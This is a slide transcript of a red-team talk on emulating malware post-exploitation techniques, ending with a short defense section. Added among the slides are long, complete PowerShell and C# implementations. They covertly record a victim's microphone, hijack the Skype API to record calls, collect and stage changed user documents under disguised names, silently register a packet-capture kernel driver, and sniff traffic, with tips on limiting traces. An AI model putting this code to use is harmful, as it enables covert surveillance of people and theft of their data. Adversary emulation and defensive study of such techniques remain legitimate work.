Adversarial Post-Ex: Lessons From The Pros
Justin Warner, Chris Ross (Veris Group's Adaptive Threat Division)
Slide transcript, uploaded by sixdub on 21-Jan-2017

Page 1: Adversarial Post-Ex: Lessons From The Pros

Justin Warner, Chris Ross
Veris Group's Adaptive Threat Division

Page 2: Overview

◦ Introductions
◦ Adversary Emulation
◦ Lessons From "Bad Guys"
◦ Post-Ex Features
  ▫ Analysis of Bad Guy Use
  ▫ Lessons Learned
  ▫ Proof Of Concept
◦ Defending Against Post-Ex
◦ Conclusion

Page 3: $whoami

◦ Justin Warner
  ▫ Manager - Offensive Services, ATD
  ▫ Former USAF Guy
  ▫ Interest: red team, reverse engineering, PowerShell, and studying tradecraft
◦ Chris Ross
  ▫ Penetration Tester/Red Teamer - ATD
  ▫ Python EmPyre Developer
  ▫ Interest: Replicate adversarial tradecraft in PowerShell and Python

Page 4: Inspiration For This Talk

◦ Richard Wartell (@Wartotell) - Malware Is Hard, Let's Go Shopping!
◦ Offensive toolsets
  ▫ Matt Graeber (@mattifestation) - PowerSploit Project
  ▫ Josh Pitts (@midnite_runr) - BDF Proxy
  ▫ Jamieson O'Reilly - Mimikittenz
◦ Lots of red team engagements

Page 5: First Things First

Let's not rush this

Page 6: Adversaries

◦ Adversary - One's opponent in a conflict
◦ Threat - The potential for the occurrence of a harmful event
  ▫ The source and means of harm
◦ This is the entity on the other side of the playing field
  ▫ A wide range of entities and abilities
  ▫ A lot can be learned by studying them

Page 7: APT Like These Guys

Page 8: ... Or More Like These Guys

Page 9: Adversary Emulation

◦ A type of red teaming that focuses on the emulation of a specific adversary
  ▫ Utilize intel to model the adversary
  ▫ Highly realistic tools
  ▫ Attempt to behave as they have before
  ▫ Many strengths
◦ Some weaknesses to this approach
  ▫ Risk of handcuffing the red team
  ▫ Easy to study tools, hard to emulate tactics/techniques (lack of intel)

Page 10: Diamond Model

The Diamond Model of Intrusion Analysis - Chris Betz, Sergio Caltagirone, Andrew Pendergast

Axiom 1: "For every intrusion event there exists an adversary taking a step towards an intended goal by using a capability over infrastructure against a victim to produce a result."

Page 11: Post-Exploitation

◦ Post-Exploitation - The actions taken by an adversary after exploitation
◦ Some example actions:
  ▫ Recon
  ▫ Privilege Escalation
  ▫ Credential Abuse
  ▫ Lateral Spread
  ▫ Additional Exploitation
  ▫ Sensitive Data Access
  ▫ Exfiltration

Page 12: Malware Repurposing

◦ The process of analyzing malware with the intent of reusing techniques, code, or actual samples
◦ Relax... somebody else has done the work so you don't have to

Page 13: School Is In Session

Bad Guys

Page 14: Learning From "Bad Guys"

◦ Benefits:
  ▫ Highly realistic (based on real events)
  ▫ Continuous tool ideas - "Hackers gonna Hack"
  ▫ They have solved the problem for you
◦ Downsides:
  ▫ Can be a significant effort to emulate
  ▫ Not always easy to translate techniques into usable assessment methods
  ▫ Risk of focusing too much on known methods
  ▫ Limit creativity

Page 15: Process For Emulation

(diagram; the steps are the titles of pages 16 to 20: see, analyze, research alternatives, implement)

Page 16: See Cool Stuff

◦ Where can we see cool stuff?
  ▫ APT Reports
  ▫ VirusTotal API
  ▫ Private malware sources
  ▫ Network defenders (for internal teams)
  ▫ VirusShare
◦ What are we trying to get our hands on?
  ▫ Raw samples
  ▫ IOCs and other obvious defensive sigs
  ▫ Technical discussion over TTPs (intel)

Page 17: Analyze Cool Stuff

◦ Malware analysis and RE skills will be useful but are not required
  ▫ Plenty of technical threat reporting to help guide your development
◦ Learning RE is fun!
  "Practical Malware Analysis"
  "The IDA Pro Book"
  Endless hours reading assembly and controlling bad guy tools
◦ Consider the value of generic TTP discussion rather than tool specifics

Page 18: We Will Not Do This To You

Page 19: Research Alternatives

◦ Are there other APIs or pre-built libraries that will allow you to accomplish this technique?
  ▫ Will be useful to be familiar with WinAPI
  ▫ .NET assemblies will have many things implemented for you
◦ Is there a project that already implemented a certain technique?
  ▫ If it is not "representative" enough, might not consider it an alternative

Page 20: Implement Cool Stuff

◦ Don't work too hard...
  ▫ No need to learn C/C++ unless you are truly strict on replicating
  ▫ Live off the land!
◦ Why are we such PS fanboys?
  ▫ Native to Win7 and above
  ▫ Direct API access through reflection
  ▫ When used appropriately, memory-only capabilities can be created
  ▫ Easy to prototype, dev, test, and deploy in a rapid manner

Page 21: Tool Disclaimer

◦ These tools are POCs written to demonstrate concepts
  ▫ Not all of them will be actively supported
◦ Use at your own risk... learn the language and review the code!
  ▫ Even better, start similar projects or contribute back to these

Page 22: Hot Cam & Hot Mic (section 1)

Oh the things you will see...

Page 23: Examples In Wild

◦ Microphone
  ▫ LuxNetRAT - "Over the Counter" RAT
    https://brage.bibsys.no/xmlui/bitstream/handle/11250/198379/KTGardasen.pdf
    Uses mciSendString to issue commands to the backend interface
◦ Webcam
  ▫ RocketKitten - MPK Shell
    Simplistic custom backdoor
    VFW capCreateCaptureWindow API call to create a hidden capture window
    SendMessage to the new capture window to control the camera actions

Page 24: How it Works - MCI Hot Mic

MCI (Media Control Interface) - Device independent method of controlling multimedia devices. Everything goes through one call, mciSendString, which takes a command string; the RAT issues this sequence:

  "open new Type waveaudio Alias SecretName"
  "record SecretName"
  Sleep (recording keeps running while the malware waits)
  "save SecretName"
  "close SecretName"
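The sequence above as an added PowerShell example. This is not the PowerSploit Get-MicrophoneAudio code from page 27 and not the LuxNetRAT code; the function names and the default output path under $env:TEMP are my own. It uses Add-Type for the winmm.dll imports, which is an assumption worth being explicit about: Add-Type compiles a helper assembly through csc.exe and leaves the intermediate files in the user's temp directory, so unlike the reflection-based tool on page 27 it is not memory-only. Two details the slide elides are also handled: "record" returns immediately (hence the sleep), and "save" needs a target path or nothing is written.

```powershell
# Added example, not code from the deck: MCI hot mic via mciSendString.
# Assumes Add-Type is acceptable on the target (it compiles through csc.exe, so it is not memory-only).
Add-Type -Namespace Win32 -Name Mci -MemberDefinition @'
[DllImport("winmm.dll", CharSet = CharSet.Unicode)]
public static extern int mciSendStringW(string command, System.Text.StringBuilder ret, int retSize, IntPtr callback);
[DllImport("winmm.dll", CharSet = CharSet.Unicode)]
public static extern bool mciGetErrorStringW(int error, System.Text.StringBuilder text, int textSize);
'@

function Invoke-Mci {
    # Send one MCI command string and return its reply; throw with the MCI error text on failure
    param([Parameter(Mandatory)][string]$Command)
    $reply = New-Object System.Text.StringBuilder 256
    $rc = [Win32.Mci]::mciSendStringW($Command, $reply, $reply.Capacity, [IntPtr]::Zero)
    if ($rc -ne 0) {
        $text = New-Object System.Text.StringBuilder 256
        [void][Win32.Mci]::mciGetErrorStringW($rc, $text, $text.Capacity)
        throw "MCI '$Command' failed ($rc): $($text.ToString())"
    }
    $reply.ToString()
}

function Get-MciMicrophoneAudio {
    param(
        [string]$Path = (Join-Path $env:TEMP 'capture.wav'),   # assumed default location
        [int]$Seconds = 10,
        [string]$Alias = 'SecretName'                           # alias name taken from the slide
    )
    # "open new type waveaudio alias X" creates a waveaudio device instance addressed by alias
    [void](Invoke-Mci "open new type waveaudio alias $Alias")
    try {
        # 16-bit mono 11 kHz PCM keeps the file small; MCI writes raw PCM, there is no compression
        [void](Invoke-Mci "set $Alias bitspersample 16 channels 1 samplespersec 11025 bytespersec 22050 alignment 2")
        [void](Invoke-Mci "record $Alias")     # returns at once, the device keeps recording
        Start-Sleep -Seconds $Seconds          # the "Sleep" box on the slide
        [void](Invoke-Mci "stop $Alias")
        [void](Invoke-Mci "save $Alias `"$Path`"")   # "save" needs a path to write the wav
    } finally {
        [void](Invoke-Mci "close $Alias")      # always release the device, even after an error
    }
    Get-Item -Path $Path
}

# Get-MciMicrophoneAudio -Seconds 5 -Path "$env:TEMP\meeting.wav"
```

The wav that lands on disk is the trace: an uncompressed 11 kHz mono file grows at about 22 KB per second, so a multi-minute capture under a user's temp directory is easy to spot in the hunt on page 47.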

Page 25: How it Works - VFW Snapshot

(diagram only: capCreateCaptureWindow creates the hidden capture window, SendMessage drives it, as described on page 23)

Page 26: Alternatives?

◦ Video
  ▫ Most of the tools we saw utilized DirectX and DirectShow to accomplish Video Capture
    There is a .NET assembly for this!
  ▫ What does MS say about VFW: (screenshot not in transcript)
◦ Audio
  ▫ We analyzed a bunch of tools that used native WinMM methods instead of MCI

Page 27: MCI Hot Mic

◦ Get-MicrophoneAudio in PowerSploit "dev" branch
  ▫ Utilizes pure reflection in PowerShell to call Win32 API in Winmm.dll
  ▫ Writes "wav" file to disk at specified location
  ▫ No compression
  https://github.com/PowerShellMafia/PowerSploit/blob/dev/Exfiltration/Get-MicrophoneAudio.ps1

Page 28: RocketKitten VFW Mockup

◦ Get-VFWSnapshot
  ▫ Logically similar mockup of camera functionality in the MPK backdoor
  ▫ Utilizes PSReflect from Matt Graeber to expose Win32 APIs
  ▫ BUT... causes user interaction almost every time (unless camera is activated)
  https://github.com/sixdub/BSidesDC2016/blob/master/Get-VFWSnapshot.ps1

Page 29: ...When We Listen To M$

◦ Get-DXWebcamVideo.ps1
  ▫ Utilizes DirectShow .NET and DirectX Capture Library
    All credit to the original authors:
    DirectX Capture - Brian Low - Public Domain
    DirectShow .NET - Unknown - LGPL
  ▫ Captures video and audio
  ▫ Supports compression and video tuning
  https://github.com/xorrior/RandomPS-Scripts/blob/master/Get-DXWebcamVideo.ps1

Page 30: Toying With Skype (section 2)

When APIs turn against you

Page 31: Examples In Wild

◦ T9000 Malware - "tyeu.dat"
  ▫ Used in APAC region for targeted attacks
◦ Malware is used to gather screenshots from active user and Skype for Desktop data
  ▫ Heavy anti-analysis features :(
  ▫ Thread 1 - desktop screenshots
  ▫ Thread 2 - targeted window screenshots
  ▫ Thread 3 - Skype monitoring via API
    Video snapshots
    Audio recordings
    Call log

Page 32: How it Works 1/2

1. RegisterWindowMessage - register the two Skype Desktop API messages, "SkypeControlAPIAttach" and "SkypeControlAPIDiscover"
2. SendMessageTimeout - send the discover message so Skype knows a client wants to attach
3. Skype Alert - Skype answers with the attach message (the user is prompted to allow the client, see page 34)
4. Messages filtered - a custom WindowProc function filters Skype's replies out of the window's message stream

Page 33: How It Works 2/2

Skype notifies the attached window of every call state change; the malware answers with commands over the same API and logs the call:

  Skype -> malware:  CALL 34243 STATUS RINGING
  Skype -> malware:  CALL 34243 STATUS INPROGRESS
  malware -> Skype:  "GET CALL 34243 PARTNER_HANDLE"
  Skype -> malware:  HotSexyBod123 (the partner handle)
  malware -> Skype:  "ALTER CALL 34243 SET_OUTPUT FILE=out.wav"
  malware -> Skype:  "ALTER CALL 34243 SET_CAPTURE_MIC FILE=mic.wav"
  Skype -> malware:  CALL 34243 STATUS FINISHED
  -> Status recorded, call logged (both sides of the audio are now on disk)

Page 34: Skype Controller

◦ Start-SkypeRecorder
  ▫ Heavily adapted from T9000 malware and other third party software.
  ▫ Utilizes pure .NET reflection to create a window and send messages.
  ▫ User interaction will be required upon request to connect to the Skype Desktop API.
  https://github.com/sixdub/BSidesDC2016/blob/master/SkypeRecorder.ps1
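An added example of the handshake on page 32 and the call-recording exchange on page 33, written as PowerShell around a small C# NativeWindow. It is not the deck's Start-SkypeRecorder (which uses pure .NET reflection rather than Add-Type) and the type and function names are mine. It assumes a Skype for Desktop build that still exposes the Desktop API (Microsoft has since retired it) and that the user approves the access prompt, the interaction page 34 warns about. Beyond what the slides show, it relies on two facts about that API: commands and notifications travel as WM_COPYDATA messages carrying a NUL-terminated UTF-8 string, and the attach reply's lParam is the attach status (0 = attached).

```powershell
# Added example, not the deck's Start-SkypeRecorder: Skype Desktop API attach and call capture.
Add-Type -AssemblyName System.Windows.Forms
Add-Type -ReferenceAssemblies System.Windows.Forms -TypeDefinition @'
using System; using System.Collections.Generic; using System.Runtime.InteropServices;
using System.Text; using System.Windows.Forms;
// Hidden window whose WndProc filters Skype's replies out of the message stream (page 32, step 4)
public class SkypeApiClient : NativeWindow {
    [DllImport("user32.dll", CharSet = CharSet.Unicode)] static extern uint RegisterWindowMessage(string name);
    [DllImport("user32.dll")] static extern bool PostMessage(IntPtr h, uint m, IntPtr w, IntPtr l);
    [DllImport("user32.dll")] static extern IntPtr SendMessageTimeout(IntPtr h, uint m, IntPtr w, IntPtr l, uint flags, uint ms, out IntPtr result);
    [StructLayout(LayoutKind.Sequential)] struct COPYDATASTRUCT { public IntPtr dwData; public int cbData; public IntPtr lpData; }
    const uint WM_COPYDATA = 0x004A;
    static readonly IntPtr HWND_BROADCAST = new IntPtr(0xFFFF);
    readonly uint discoverMsg = RegisterWindowMessage("SkypeControlAPIDiscover");   // step 1
    readonly uint attachMsg   = RegisterWindowMessage("SkypeControlAPIAttach");
    public IntPtr SkypeHandle = IntPtr.Zero;
    public int AttachStatus = -1;   // 0 SUCCESS, 1 PENDING_AUTHORIZATION, 2 REFUSED, 3 NOT_AVAILABLE, 0x8001 API_AVAILABLE
    public Queue<string> Notifications = new Queue<string>();
    public SkypeApiClient() { CreateHandle(new CreateParams()); }
    public void Discover() { PostMessage(HWND_BROADCAST, discoverMsg, Handle, IntPtr.Zero); }   // step 2
    public bool Send(string command) {   // command text goes to Skype as WM_COPYDATA
        if (SkypeHandle == IntPtr.Zero) return false;
        byte[] bytes = Encoding.UTF8.GetBytes(command + "\0");
        IntPtr data = Marshal.AllocHGlobal(bytes.Length), cds = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(COPYDATASTRUCT)));
        try {
            Marshal.Copy(bytes, 0, data, bytes.Length);
            COPYDATASTRUCT s = new COPYDATASTRUCT { dwData = IntPtr.Zero, cbData = bytes.Length, lpData = data };
            Marshal.StructureToPtr(s, cds, false);
            IntPtr result;
            IntPtr ok = SendMessageTimeout(SkypeHandle, WM_COPYDATA, Handle, cds, 0x0002 /* SMTO_ABORTIFHUNG */, 5000, out result);
            return ok != IntPtr.Zero && result != IntPtr.Zero;
        } finally { Marshal.FreeHGlobal(cds); Marshal.FreeHGlobal(data); }
    }
    protected override void WndProc(ref Message m) {
        if (m.Msg == attachMsg) {                       // step 3: Skype answers the discover
            AttachStatus = (int)m.LParam.ToInt64();
            if (AttachStatus == 0) SkypeHandle = m.WParam;
        } else if (m.Msg == WM_COPYDATA && m.WParam == SkypeHandle) {
            COPYDATASTRUCT s = (COPYDATASTRUCT)Marshal.PtrToStructure(m.LParam, typeof(COPYDATASTRUCT));
            byte[] buf = new byte[s.cbData]; Marshal.Copy(s.lpData, buf, 0, s.cbData);
            Notifications.Enqueue(Encoding.UTF8.GetString(buf).TrimEnd('\0'));
            m.Result = new IntPtr(1); return;           // tell Skype the notification was consumed
        }
        base.WndProc(ref m);
    }
}
'@

function Connect-SkypeApi {
    param([int]$TimeoutSeconds = 60)
    $client = New-Object SkypeApiClient
    $client.Discover()
    $deadline = (Get-Date).AddSeconds($TimeoutSeconds)
    # Pump the queue so WndProc runs; the user's approval in the Skype prompt arrives as a second attach message
    while ($client.AttachStatus -ne 0 -and (Get-Date) -lt $deadline) {
        [System.Windows.Forms.Application]::DoEvents(); Start-Sleep -Milliseconds 100
    }
    if ($client.AttachStatus -ne 0) { throw "Skype attach failed, status $($client.AttachStatus)" }
    [void]$client.Send('PROTOCOL 8')
    $client
}

function Start-SkypeCallCapture {
    param($Client, [string]$OutDir = $env:TEMP, [int]$Seconds = 600)
    $deadline = (Get-Date).AddSeconds($Seconds); $seen = @{}
    while ((Get-Date) -lt $deadline) {
        [System.Windows.Forms.Application]::DoEvents()
        while ($Client.Notifications.Count -gt 0) {
            $n = $Client.Notifications.Dequeue()
            if ($n -match '^CALL (\d+) STATUS (\w+)$') {                  # e.g. "CALL 34243 STATUS INPROGRESS"
                $id, $status = $matches[1], $matches[2]
                if ($status -eq 'INPROGRESS' -and -not $seen.ContainsKey($id)) {   # the page 33 sequence
                    $seen[$id] = $true
                    [void]$Client.Send("GET CALL $id PARTNER_HANDLE")
                    [void]$Client.Send("ALTER CALL $id SET_OUTPUT FILE=`"$OutDir\$id-out.wav`"")
                    [void]$Client.Send("ALTER CALL $id SET_CAPTURE_MIC FILE=`"$OutDir\$id-mic.wav`"")
                } elseif ($status -eq 'FINISHED') { "$(Get-Date -Format s) call $id finished" }
            } elseif ($n -match '^CALL (\d+) PARTNER_HANDLE (.+)$') { "$(Get-Date -Format s) call $($matches[1]) partner $($matches[2])" }
        }
        Start-Sleep -Milliseconds 200
    }
}
# $c = Connect-SkypeApi; Start-SkypeCallCapture -Client $c -Seconds 300
```

The loop has to keep pumping messages with DoEvents because Skype delivers every reply through the window procedure on the thread that created the window; a script that blocks in Start-Sleep for the whole capture would never see the attach or the call notifications.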

Page 35: File System Fun (section 3)

Gift that keeps on giving

Page 36: Example In Wild

◦ FLASHFLOOD Malware
  ▫ APT30 aka NaikonAPT
◦ Profiles host and packages up selected files
  ▫ Uses timestamps to measure change
  ▫ Uses deflate compression with slight mod
◦ Gathers:
  ▫ Windows Address Book (WAB) info
  ▫ All .lnk files from recent docs
  ▫ All files matching predefined patterns from:
    Connected drives (USBs)
    Desktop
    Temp internet files
    Temp

Page 37: How it Works

Each candidate file is checked against the time recorded on the previous run; only files newer than that are staged:

  Desktop\accounts.doc   -> newer than recorded time? -> Windows\$NtUninstallKB885884$\FlashFiles\accounts.ldf
  Desktop\Passwords.csv  -> newer than recorded time? -> (staged the same way, under the same fake hotfix directory)

Page 38: Alternate Techniques?

◦ Eventing Options:
  ▫ FindFirstChangeNotification - Win32 API to utilize asynchronous eventing to alert on file changes
  ▫ System.IO.FileSystemWatcher - .NET class that monitors file system changes
    https://gist.github.com/HarmJ0y/4034d935a3386b96f3ac
  ▫ WMI Eventing to detect change
◦ Numerous options available for storage/compression/encryption
  ▫ Will Schroeder's (@harmj0y) Out-EncryptedStore function

Page 39: FileSystemWatcher Exfil

◦ Utilizes Start-FileSystemMonitor
  ▫ Slight tweaks to make it dump output
◦ Combine with the following
  ▫ Out-EncryptedStore - BETTER OPTION
    Custom capability
    Uses RSA/AES as desired
    http://www.harmj0y.net/blog/redteaming/offensive-encrypted-data-storage
  ▫ Write-FlashfloodFile
    Replicates algorithm in FLASHFLOOD
    https://github.com/sixdub/BSidesDC2016/blob/master/Write-FlashfloodFile.ps1
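An added example covering both the timestamp gate on pages 36-37 and the FileSystemWatcher alternative on pages 38-39 in one script. It is my own code, not the deck's Write-FlashfloodFile or Start-FileSystemMonitor, and it does not reproduce FLASHFLOOD's modified deflate: it uses .NET's stock DeflateStream. The "recorded time" is a marker file holding the previous run's timestamp, and only files written after it are staged. The roots, file patterns, marker path and staging directory under $env:TEMP are assumptions, as is the .ldf rename, which copies the slide's accounts.doc -> accounts.ldf.

```powershell
# Added example, not the deck's tooling: timestamp-gated collection (FLASHFLOOD style)
# plus a FileSystemWatcher variant. Roots, patterns and paths below are assumptions.
function Get-ChangedFiles {
    param(
        [string[]]$Roots = @([Environment]::GetFolderPath('Desktop'), [Environment]::GetFolderPath('Recent'),
                             [Environment]::GetFolderPath('InternetCache'), $env:TEMP),
        [string[]]$Patterns = @('*.doc','*.docx','*.xls','*.xlsx','*.pdf','*.csv','*.txt','*.lnk'),
        [string]$MarkerPath = (Join-Path $env:APPDATA 'lastrun.dat'),
        [switch]$IncludeRemovable
    )
    # FLASHFLOOD also walked connected drives; DriveType 2 is removable media
    if ($IncludeRemovable) {
        $Roots += Get-WmiObject Win32_LogicalDisk -Filter 'DriveType=2' | ForEach-Object { $_.DeviceID + '\' }
    }
    # The recorded time is the gate: anything written since the previous run counts as new
    $since = if (Test-Path $MarkerPath) { [datetime][long]((Get-Content $MarkerPath) -join '') } else { [datetime]::MinValue }
    $now = Get-Date
    foreach ($root in $Roots) {
        if (-not (Test-Path $root)) { continue }
        Get-ChildItem -Path $root -Include $Patterns -Recurse -Force -ErrorAction SilentlyContinue |
            Where-Object { -not $_.PSIsContainer -and $_.LastWriteTime -gt $since }
    }
    Set-Content -Path $MarkerPath -Value $now.Ticks   # becomes the "recorded time" for the next run
}

function Write-DeflatedCopy {
    param([Parameter(Mandatory, ValueFromPipeline)][IO.FileInfo]$File,
          [string]$StageDir = (Join-Path $env:TEMP 'FlashFiles'))   # the real malware used a fake $NtUninstallKB...$ dir
    process {
        if (-not (Test-Path $StageDir)) { New-Item -ItemType Directory -Path $StageDir -Force | Out-Null }
        # Staged copies are renamed like the slide's accounts.doc -> accounts.ldf; the timestamp avoids name clashes
        $dest = Join-Path $StageDir ('{0}_{1:yyyyMMddHHmmss}.ldf' -f $File.BaseName, $File.LastWriteTime)
        $in = [IO.File]::OpenRead($File.FullName); $out = [IO.File]::Create($dest)
        $deflate = New-Object IO.Compression.DeflateStream($out, [IO.Compression.CompressionMode]::Compress)
        try { $in.CopyTo($deflate) } finally { $deflate.Dispose(); $out.Dispose(); $in.Dispose() }
        Get-Item $dest
    }
}

function Start-ChangeCollector {
    # Event-driven alternative from page 38: FileSystemWatcher instead of a timestamp sweep
    param([string]$Path = [Environment]::GetFolderPath('Desktop'), [string]$StageDir = (Join-Path $env:TEMP 'FlashFiles'))
    $watcher = New-Object IO.FileSystemWatcher $Path
    $watcher.IncludeSubdirectories = $true
    $watcher.EnableRaisingEvents = $true
    $action = {
        $p = $Event.SourceEventArgs.FullPath
        # Changed fires while a file is still open; a copy that fails on a locked file is retried on the next event
        if (Test-Path $p -PathType Leaf) { try { Write-DeflatedCopy -File (Get-Item $p) -StageDir $Event.MessageData | Out-Null } catch {} }
    }
    foreach ($name in 'Created','Changed') { Register-ObjectEvent -InputObject $watcher -EventName $name -Action $action -MessageData $StageDir | Out-Null }
    $watcher
}
# Get-ChangedFiles -IncludeRemovable | Write-DeflatedCopy       # sweep since the last run
# $w = Start-ChangeCollector                                       # or watch; $w.Dispose() stops it
```

Dot-source the file before calling Start-ChangeCollector, because the event action runs later in the session and needs Write-DeflatedCopy to still be defined. The sweep and the watcher leave different traces: the sweep touches the marker file and walks directories on a schedule, the watcher keeps a handle open on the watched tree for as long as it runs.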

Page 40: Catching Packetz (section 4)

A deep look inside target networks

Page 41: Examples In Wild

◦ NaikonAPT / APT30
  ▫ "Lateral movements included copying over and remotely setting up winpcap across desktop systems… then remotely setting up AT jobs to run"
◦ RocketKitten
  ▫ MPK Shell - Raw sockets to sniff TCP/UDP
◦ Duqu 2.0
  ▫ Dropped WinPCAP driver in VFS and loaded to inject MDNS replies

Page 42: How it Works - WinPCAP

1 - Install WinPCAP "Silently"
  Drop npf.sys into %WINDIR%\system32\drivers and packet.dll, wpcap.dll, pthreadVC.dll into %WINDIR%\system32
  sc.exe create npf ... (register the driver as a kernel-mode service)
2 - Utilize WinPCAP For Capture
  pcap_open -> pcap_compile -> pcap_setfilter -> pcap_dump_open -> pcap_dump
  Output: secretdump.pcap

Page 43: Research

◦ Numerous other methods can be used to capture/trace packets:
  ▫ Windows Filtering Platform Drivers
  ▫ Event Tracing for Windows (ETW)
◦ Inveigh uses raw sockets to spoof
  ▫ Kevin Robertson (@Kevin_Robertson)
◦ Previous work by Alex Rymdeko (@killswitch_GUI)
◦ Several .NET assemblies help us with WinPCAP in PowerShell

Page 44: WinPCap Mockup

◦ Get-WinPCapCapture
  ▫ Utilizes Packet.NET and SharpPCap assemblies to accomplish capture (credit to those authors!)
  ▫ Comes with Install and Remove function for "hot" loading of WinPCAP
  ▫ Allows you to add filters
  ▫ Stops capture when:
    Timeout is hit
    Size limit is reached
  https://github.com/sixdub/BSidesDC2016/blob/master/Get-WinPCapCapture.ps1
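An added example of the page 42 sequence with direct P/Invoke into wpcap.dll instead of the SharpPcap and Packet.NET assemblies Get-WinPCapCapture uses; the function names are mine, not the deck's. Install-NpfDriver shows the "silent" registration for a copy of the four WinPcap files the operator has staged somewhere (the source directory is an assumption): it needs administrator rights and a signed npf.sys, and it writes the service-install event that the defense slides tell you to hunt for. Get-PcapCapture then assumes the driver is loaded and the DLLs are on the path, with bitness matching the PowerShell process (64-bit PowerShell needs the 64-bit wpcap.dll and packet.dll). The stop conditions mirror page 44.

```powershell
# Added example, not the deck's Get-WinPCapCapture: WinPcap driver registration plus the
# pcap_open/compile/setfilter/dump_open/dump sequence through P/Invoke. Paths are assumptions.
Add-Type -Namespace Win32 -Name Pcap -MemberDefinition @'
[DllImport("wpcap.dll", CallingConvention = CallingConvention.Cdecl)] public static extern int pcap_findalldevs(out IntPtr alldevs, System.Text.StringBuilder errbuf);
[DllImport("wpcap.dll", CallingConvention = CallingConvention.Cdecl)] public static extern void pcap_freealldevs(IntPtr alldevs);
[DllImport("wpcap.dll", CallingConvention = CallingConvention.Cdecl)] public static extern IntPtr pcap_open_live(string device, int snaplen, int promisc, int to_ms, System.Text.StringBuilder errbuf);
[DllImport("wpcap.dll", CallingConvention = CallingConvention.Cdecl)] public static extern int pcap_compile(IntPtr p, IntPtr prog, string filter, int optimize, uint netmask);
[DllImport("wpcap.dll", CallingConvention = CallingConvention.Cdecl)] public static extern int pcap_setfilter(IntPtr p, IntPtr prog);
[DllImport("wpcap.dll", CallingConvention = CallingConvention.Cdecl)] public static extern void pcap_freecode(IntPtr prog);
[DllImport("wpcap.dll", CallingConvention = CallingConvention.Cdecl)] public static extern IntPtr pcap_dump_open(IntPtr p, string file);
[DllImport("wpcap.dll", CallingConvention = CallingConvention.Cdecl)] public static extern int pcap_next_ex(IntPtr p, out IntPtr header, out IntPtr data);
[DllImport("wpcap.dll", CallingConvention = CallingConvention.Cdecl)] public static extern void pcap_dump(IntPtr dumper, IntPtr header, IntPtr data);
[DllImport("wpcap.dll", CallingConvention = CallingConvention.Cdecl)] public static extern void pcap_dump_close(IntPtr dumper);
[DllImport("wpcap.dll", CallingConvention = CallingConvention.Cdecl)] public static extern void pcap_close(IntPtr p);
'@

function Install-NpfDriver {
    # The "silent" install from page 42: copy the four WinPcap files from an operator-staged
    # directory (assumed) and register npf as a kernel service. Needs admin; logs System event 7045.
    param([Parameter(Mandatory)][string]$SourceDir)
    $sys32 = Join-Path $env:WINDIR 'System32'
    Copy-Item (Join-Path $SourceDir 'npf.sys') (Join-Path $sys32 'drivers\npf.sys')
    foreach ($dll in 'packet.dll','wpcap.dll','pthreadVC.dll') { Copy-Item (Join-Path $SourceDir $dll) $sys32 }
    & sc.exe create npf binPath= 'system32\drivers\npf.sys' type= kernel start= demand | Out-Null
    & sc.exe start npf | Out-Null
}

function Get-PcapCapture {
    param(
        [string]$Device,                                        # \Device\NPF_{GUID}; first adapter when omitted
        [string]$Filter = 'tcp port 445 or tcp port 389',       # BPF syntax, as in tcpdump
        [string]$OutFile = (Join-Path $env:TEMP 'secretdump.pcap'),
        [int]$TimeoutSeconds = 60,
        [long]$MaxBytes = 10MB                                  # stop conditions from page 44
    )
    $M = [Runtime.InteropServices.Marshal]
    $err = New-Object System.Text.StringBuilder 256
    if (-not $Device) {
        $devs = [IntPtr]::Zero
        if ([Win32.Pcap]::pcap_findalldevs([ref]$devs, $err) -ne 0 -or $devs -eq [IntPtr]::Zero) { throw "pcap_findalldevs: $err" }
        $Device = $M::PtrToStringAnsi($M::ReadIntPtr($devs, [IntPtr]::Size))   # pcap_if.name follows the next pointer
        [Win32.Pcap]::pcap_freealldevs($devs)
    }
    $p = [Win32.Pcap]::pcap_open_live($Device, 65535, 1, 1000, $err)        # promiscuous, 1 s read timeout
    if ($p -eq [IntPtr]::Zero) { throw "pcap_open_live($Device): $err" }
    $prog = $M::AllocHGlobal(16); $M::WriteInt64($prog, 0, 0); $M::WriteInt64($prog, 8, 0)   # zeroed struct bpf_program
    $dumper = [IntPtr]::Zero; $compiled = $false; $bytes = 0L; $packets = 0
    try {
        if ([Win32.Pcap]::pcap_compile($p, $prog, $Filter, 1, 0xffffffff) -ne 0) { throw "pcap_compile failed for '$Filter'" }
        $compiled = $true
        if ([Win32.Pcap]::pcap_setfilter($p, $prog) -ne 0) { throw 'pcap_setfilter failed' }
        $dumper = [Win32.Pcap]::pcap_dump_open($p, $OutFile)
        if ($dumper -eq [IntPtr]::Zero) { throw "pcap_dump_open($OutFile) failed" }
        $deadline = (Get-Date).AddSeconds($TimeoutSeconds); $hdr = [IntPtr]::Zero; $data = [IntPtr]::Zero
        while ((Get-Date) -lt $deadline -and $bytes -lt $MaxBytes) {
            $rc = [Win32.Pcap]::pcap_next_ex($p, [ref]$hdr, [ref]$data)
            if ($rc -lt 0) { break }        # -1 error, -2 end of capture
            if ($rc -eq 0) { continue }     # read timeout expired with no packet
            [Win32.Pcap]::pcap_dump($dumper, $hdr, $data)
            $bytes += $M::ReadInt32($hdr, 8)   # pcap_pkthdr.caplen sits after the 8-byte timeval
            $packets++
        }
    } finally {
        if ($dumper -ne [IntPtr]::Zero) { [Win32.Pcap]::pcap_dump_close($dumper) }
        if ($compiled) { [Win32.Pcap]::pcap_freecode($prog) }
        $M::FreeHGlobal($prog)
        [Win32.Pcap]::pcap_close($p)
    }
    [pscustomobject]@{ Device = $Device; File = $OutFile; Packets = $packets; Bytes = $bytes }
}
# Get-PcapCapture -Filter 'port 88' -TimeoutSeconds 120 -MaxBytes 5MB
```

Keep the filter tight and the size limit small: the pcap on disk is the largest and most obvious artefact this technique leaves, and page 41's APT30 quote shows the capture itself being scheduled rather than run interactively.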

Page 45: Defense & Conclusion

IS THE WORLD ENDING?!??!

Page 46: Mitigation

◦ There is not a single trick to prevent post-exploitation actions
  ▫ "Users gonna use" - @enigma0x3
  ▫ PowerShell != Enemy
◦ Use industry "best practice"
  ▫ Heavy auditing of environments
◦ You don't need next-gen if you don't defend the current-gen
  ▫ http://www.leeholmes.com/blog/2014/12/08/maslows-hierarchy-of-security-controls/

Page 47: "Every contact leaves a trace"

◦ Locard's Exchange Principle
◦ So go find the trace...
◦ What about threat hunting?

Page 48: Conclusion

◦ Realistic threat replication must properly model threats
  ▫ Realistic tactics (study intel)
  ▫ Observed techniques
  ▫ Similar behavior or procedures
◦ There are plenty of creative Post-Ex techniques to use
  ▫ Don't be so square... :)
◦ You are defending against a human
